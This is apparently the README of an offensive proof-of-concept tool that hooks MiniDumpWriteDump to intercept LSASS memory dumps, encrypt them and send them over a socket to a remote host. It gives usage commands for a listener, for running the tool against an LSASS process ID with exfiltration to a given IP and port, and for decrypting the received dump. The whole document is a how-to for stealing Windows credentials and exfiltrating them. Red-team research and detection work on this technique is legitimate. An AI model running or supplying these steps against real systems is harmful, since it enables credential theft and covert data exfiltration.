MiniDumpWriteDump behavior modification hook

Overview

MiniDumpWriteDumpPoC

Read the full article in our blog: Adepts Of 0xCC: Hooks On Hoot Off

This is a function hook that gives access to the buffer generated by MiniDumpWriteDump before it is written to disk.

Once the buffer is captured, the hook encrypts it and sends it through a socket to a given host.

Compilation

A full VS solution is provided. Just compile it.

Usage

First, set up the server to listen on the receiving host:

python3 serv.py <PORT>

    python3 serv.py 1234
Then run the PoC, passing the target PID and the options below:

.\minidumppoc.exe <LSASS_PID> <WRITE_TO_FILE 0|1> <EXFIL 0|1> [<HOST> <PORT>] [<EXPORT_PATH>]

    minidump.exe 696 1 1 '192.168.1.10' 1234 "c:\test.dmp"

Once the whole file is received, close the server and use the dummy decryptor:

python3 dec.py woot.dmp woot_decrypted.dmp 0xb0

Owner

Adepts of 0xCC